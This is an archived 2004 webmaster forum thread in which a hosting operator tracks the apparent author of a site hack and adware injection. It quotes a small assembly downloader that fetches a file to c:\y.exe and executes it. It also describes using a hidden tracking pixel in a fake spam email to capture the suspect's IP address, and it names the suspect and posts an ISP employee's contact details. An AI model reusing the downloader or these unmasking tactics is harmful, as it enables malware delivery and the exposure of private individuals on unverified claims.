SplitInfinity

Master of misdirection this guy is:


good thing the internet has a memory
http://216.239.59.104/search?q=cache...b00gle.com/fa/
%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache...b00gle.com/fa/
tool.html+&hl=en


http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the
same files, as if copied in a for loop

i especially liked 2 files in the dir; counter.htm containing the
extremely funny
hahahahahahahaha language="hahahahahahahahahaha">
<!--
var lang = navigator.systemLanguage;
if (lang hahahaha "ru") document.location = "home.html";
//-->
</hahahahahahahaha


but then i saw this:
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope
im not Violating someones copyright by posting this here,....

.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

________szLibrary db "urlmon.dll",0
________szFunction db "URLDownloadToFileA",0

________szFileName db "c:\y.exe", 0

.code
start:

________invoke GetCommandLineA

________add ax, 0Ah
________lea ecx, [eax]
________push ecx

________invoke LoadLibrary, addr szLibrary
________invoke GetProcAddress, eax, addr szFunction

________pop ecx
________push 0
________push 0
________lea ebx, [szFileName]
________push ebx
________push ecx
________push 0
________call eax

________invoke WinExec, addr szFileName, 1
________invoke ExitProcess, NULL

end start


Yet i do feel a bit suspicious about this set of files;,... bit TOO
educating i think ;)

SplitInfinity

Wow!

http://www.webhelper4u.com/thewatcherlist.html

Jackpot. It could be ANY of those people.

IS YOUR NAME ON THAT LIST?

Lots of adult sites listed.

SplitInfinity

Ok, I know the issue now:

Your PHP is insecure. Update and secure your PHP on your web server.
Update apache as well. Make sure you are current.

Here is a list of the AdWare people and their IP's:
http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

Notice if you copy the first three parts of an IP and search elsewhere
in the list you will find many domain on the same class C? Voila.

Happy hanging.

JayJay

Don't forget your pipe, Sherlock

Snake

Bumping this. I hit one of the BangBros Tugjobs hosted galleries and was hit with and active X for Trytoimprovesecurity.com also. It attempts to hijack the browser and install something, blocked it with Norton.
IP associated is 213.159.117.133

SplitInfinity

Amazing how many adult sites are engagine in bad adware:

http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

I just got an ICQ from a stranger telling me that if I push any
further they will come kill me. They are hackers paid by adult
industry to hack sites and put that on them, fucked up shit.

Fuck them, I will keep pushing and find out who they are
and expose them for hacking into sites illegaly. Put aside
the adware part, they are still breaking and entering.

I'm coming to get ya!

QuaWee

who's your hosting company?

__________________
i luv mainstream

xlogger

Time to get hosting from you.

__________________

----------
XLOGGER [REFLECTED] [OH]

skoalman

Out of 100, I'd say 95 would be hackable. And that's just with a basic security audit, if I did a full blown one all of them, I'd say at leat 99 of them would be insecure in one way or another. I've been doing security work for the better part of 20 years and have yet to see a fully secure system.

If someone wants in, they will get in. Plain and simple. I've also yet to see a system that I haven't been able to penatrate during a full blown pen test. Most security people are that way and if they are not, they need to learn more.

SplitInfinity

I am happy though that alot of webmasters/site owners are taking security
into consideration now. They used to laugh back in the days when we told
them it was a hacker..... it had the same effect as if we told them a yellow
zebra was standing behind them.

I have been in security since 1992 and just love the thrill of securing a box and
hunting down hackers.

:-)

I smell their blood.l

lol

skillfull

ive done a lots of security industry works too, a server can be secure but will become useless with all the security
but there is way to put a server very very secure even against unknown exploit
i can sure make a server 99.9% of the hackers cant hack

__________________
mind at underdark dot cc
SEO Analyst
Thunder-Ball.net - Member

skoalman

Yea disable every service known and pray that your kernel is secure and your router and firewall is updated. I've gotten around many "secure" servers because they didn't keep their routers and firewalls updated.

PowerCum

Enable PaX with memory page segmentation and randomization, role based access control and some strong acl system (kernel and fs based) and then watch how funny is when someone becomes root on the server and then can do nothing
And don't forget to compile all your distro by hand and strip all the binaries.
Also if you want more security put all the services in chroot (best optoin is one service per server)... and don't just copy all the system into the chroot, only the needed libraries... apache does not need a bash shell in order to run into it's sandbox.
Of course, this will do nothing if you open every possible service around and set your root password to something easy to guess. So configure your firewall properly blocking all inbound SYN packets except for the ports where you will offer some service and all outbound packets (any traffic) except for the ports your services will use. You will get some headaches configuring FTP services using these firewall rules... but it's not very big problem.

This concept has been tested for over 5 years with IronBox Linux on an open for hacking shell access server (they were able to start a shell session on the box) and no one has been able to escalate privileges.

It's not only the firewall, it's the entire system. Usually firewalls are the most useless part in security because they could be always bypassed using one method or another. It's not easy and takes some time to bypass a firewall, but it's still possible nod not enough difficult to stop a not very novice hacker.

__________________
CjOverkill Traffic Trading Script
Free, secure and fast traffic trading script. Get your copy now

SplitInfinity

I have caught your hacker!

Here is the lowdown.....

To find the hacker you must first find out who owns those domains.....
And the only way to see who owns those domains (because the info is fake)
is to find out WHO is receiving the emails for the domain's contact email account,
which for all those domains, is the same person.

This person uses a yahoo email address, and getting the info on who owns
an email account from yahoo would be very difficult, especially considering
they most likely filled in fake info there as well. So why not get their IP from yahoo you ask? Because yahoo won't help you without a subpeona.....
Even friends I have at yahoo can't help me because they do not allow access
to logs except to their legal dept. which is a pain to deal with as well.....

So, I ask myself, If this person is using a yahoo web based email account to check his mail, and we need his IP address to identify him, let's get the IP already!

I decided to email an artifical spam mail to him. The secret here is that
he is the ONLY one getting this spam mail. I used a rather catchy subject
that he COULD NOT RESIST:

"Hacker Caught?"

When he looked at the email, it was nothing special. I made it look like an
ad to an online casino. He would take a peek at it, then most likely just delete it
thinking to himself, "fucking spammer!", while his heart pumped heavily thinking
perhaps he had been caught.

What he DID NOT KNOW that happened behind the scenes is that in the spam
mail, the only image that was loaded in the email was an invisible 1x1 pixel.
All other items in the mail were HTML.

This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist and since I set the
height and width of the image to 1, he would not see a broken image in there
anyways..... this would simply generate a couple log entries on my server
letting me know HIS HOME COMPUTERS IP ADDRESS because in order to use
yahoo mail, you have to use a web browser, and he certainly did!!!

Because the image does not exist on my server, but his browser tried to load it,
his accessing his yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry.

The URL to the non-existant image is: http://www.splitinfinity.com/themainman

access_log entry:
195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_84 6_4944_1839376362&Idx=0&YY=48958&inc=25&order=down &sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"

error_log entry:
[Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox


******** His IP address is: 195.131.125.119 **********

This is most likely a dynamic IP, but, since we know the time and date of the
access, we can call the IP owner (his ISP as listed below) and perhaps get
that information. I will continue to send him some of these emails and
log all the ip ranges he comes from, which im sure at this point will all be
the same isp since it is a broadband connection on his end.

w00000h00000!

betcha he didn't see that coming.

SplitInfinity

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 195.0.0.0 - 195.255.255.255
CIDR: 195.0.0.0/8
NetName: RIPE-CBLK3
NetHandle: NET-195-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS2.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH03.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 1996-03-25
Updated: 2004-03-16

TechHandle: RIPE-NCC-ARIN
TechName: RIPE NCC Hostmaster
TechPhone: +31 20 535 4444
TechEmail: [email protected]

# ARIN WHOIS database, last updated 2004-08-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

SplitInfinity

Further more accurate whois data from RIPE:

The company who OWNS the IP itself is:
WEBPlus Ltd.
St.Petersburg, RU

Their email addresses:
[email protected]
[email protected]
[email protected]
[email protected]


Michael V. Vasiliev
ZAO WebPlus, 29 Kolomenskaya
191119, Saint-Petersburg
Russia
phone: +7 812 3269020
fax-no: +7 812 3269029

prodiac

Great job, boss

iwantchixx

that's total assholish of you. Like it's his fault someone hacked his shit. it's as retarted as blaming Ford becuase someone slammed a semi into the car but buddie died cause he didnt have seatbelts on.

Point is, secure or not, these people find ways in.

broke

This thread was surely interesting...

Stramm

well done SplitInfinity. Was very interesting to follow your progress even if most of the links are already dead

cosis

very impressive splitinfinity, now we need a team of webmasters to pay this guy a visit

skillfull

ah btw
http://www.gofuckyourself.com/showth...adid=343314&s=

__________________
mind at underdark dot cc
SEO Analyst
Thunder-Ball.net - Member

GoNe

__________________
buying domains 1 year or more in age. Adult related only. Email me at webmaster @ crazyvids.com

http

The BW prices on your site, are they actual usage (as in 320 GB in+out combined is 1 mbps) or 95 pecentile based? 95% I guess?

xlogger

damn this thread rules!

__________________

----------
XLOGGER [REFLECTED] [OH]

skoalman

Well done!

I see that at someone else on here has the skills. Tracking down hackers isn't as hard as people think it is. I did it many many times when I was the IT manager and head of security for a live feed company and also have done it for clients of mine.

I may have a use for you sometime as sometimes I get too busy for all my clients and taking on more work is not always the best things as I want my clients to be %150 happy with what I do and so I limit what I'll take so I don't stretch myself too thin.

sixxxthsense

splitinfinity is the fucking MAN!!!

zdwebber

You really know your shit SplitInfinty, very impressive!
I'd trust you with my box

SplitInfinity

The bandwidth pricing on SplitInfinity.com is average utilization based on MRTG graphs. Bring your sites over. :-)


Thanks for the compliments.
Anyone else need any help?

I really love doing this stuff....

By the way,

The guy's name is Miroslav Petrovic who hacked your site.
:-)

Go get em!

fr8

So how are things going. have you owned is ass yet?

__________________
█ joesmut (a) gmail Dot com
█ Full Stack Developer

SplitInfinity

Hey, I just thought about something,
if you still have your web servers logs, I bet
your hackers IP is in the web logs.....

He will have been the VERY FIRST person to see the IFRAMES....
They always test their work just after they implemeted the html
modifications...... They normally will be one of the very first hits
in your web logs just after the mods were done so thats a good
way to age the hack and know what time it occurred.....

Keep in mind the last octets of his ip may change because his ISP told me
they only have that one class C for their broadband customers...

:-)

SplitInfinity

Just emailed him again:

SUBJECT: Yahoo space utilization

he will click on it, say Fuck that spammer and delete it....
meanwhile I log him again.

I have logged him from the same class C 3 times now during the hours of 1am to 3 am PST so that is his hours of operation and that time fits daytime in his countrys time zone. :-)

So were creating a dossier on this guy.
:-)

SplitInfinity

Looks like some of you guys tried my honeypot link:

Notice the gfy referral links. :-0

62.42.228.6 www.splitinfinity.com - [19/Aug/2004:16:32:47 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gofuckyourself.com/showthread.php?s=&threadid=342366&perpage=50&pagen umber=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
68.83.122.119 www.splitinfinity.com - [19/Aug/2004:17:35:57 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gfyboard.com/showthread.php?s=&threadid=342366&perpage=50&pagen umber=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"
164.107.220.226 www.splitinfinity.com - [19/Aug/2004:17:58:51 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gofuckyourself.com/showthread.php?s=&threadid=342366&perpage=50&pagen umber=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"

exposed

pfttt....not true

__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger

exposed

lmfao

__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger

exposed

hahaha nice!

owned.

__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger

SplitInfinity

Hahahah,

Had to change my honeypot link in the emails I sent him because
I got 124 GFY'ers trying to load it up to see what it does.... lol!
That will interfere with my forensics. :-) So I changed it from here on out.

You guys dont wanna be mistaked for Joe hacker do you?

HEY, there cold be a nice reality show, Joe Hacker.

:-)

FrankWhite

whats your icq ? i need to get in touch with you.

spacemonk

SplitInfinity

__________________
I sale fu-fme, hit me up for a killer deal!

SplitInfinity

64791506

:-)

SplitInfinity

Thanks for the

SplitInfinity

We sold several accounts yesterday with the offer we posted, it appears that people liked it a lot. We have decided to offer it again today.

Today we have 3 more 10Mb/s Unmetered Dedicated Server packages available.

- P4 2.4ghz
- 1GB RAM
- 80GB IDE
- 10Mb/s Unmetered Bandwidth (10Mb/s port)
- Linux/FreeBSD
- Cpanel available at extra cost if desired.
- $500.00 per month
- FREE SETUP

Use coupon ' chrislovesme ' for 75% off of your order.

--> Click Here to order Instantly <--

We can have you online today. Contact me if you have any questions.

skoalman

You can have so much more fun with that guy, you know he's just begging to come at you now.

__________________

SplitInfinity

hahahah! The guy ICQ'd me!

I sent him an email saying:

SUBJECT: hey dude, ICQ ME.

Wanted to know if I can hire you to do network security for me.
I was referred to you by some porn people.


he replied and is sending me a resume. hahahah!
The fuker lives in seattle! He is in Russia for the summer to visit
some relatives and study there.
hahaha

I cant wait to get all his info. I will scan the shit when I get the fax.
Note: He is FAXING it to me.... Let's hope the part of russia where he
is has caller ID.
:-)

JayJay

BUMP!
You Rock

sixxxthsense

u've taken this to the extreme! what do u plan to do to this fuck?

gwilkins

Wow, with the death threat and all the money he's stolen you could put him in jail for a very long time. I'm sure the FBI would love to hear from you. They could just pick him up at the airport in Seattle

KC

pfft... yes.. true.

How can you be certain you have plugged every hole of a rooted box?

__________________

Jupiter Hosting, Inc.
Vice President, Business Development
kc (AT) jupiterhosting.com

SplitInfinity

You can be reasonable certain if you know what you are doing and take steps in advance of ever being hacked to prevent major corruption, like kernel level ACL's and so forth, however you cannot ever be truly certain until you first know HOW he got in and WHAT they ran to rootkit your system.

For example, if you find their rootkit, the you can be pretty sure... but
NEVER 100%. I would never say 100% because were human and we miss
obvious things. Hackers use the psychological understanding they know of us
to abuse us and re-enter our systems....

Lots of hackers imbed backdoors in our own php scripts... so even a program
YOU WROTE might have been modified by the hacker without you knowing
to email him your password file so he can run crack on it or even to execute other files he hid on the server at his request by loading a url he hid on your box....
Run on sentences tonight.

:-)

cosis

i guess we know he doesnt read gfy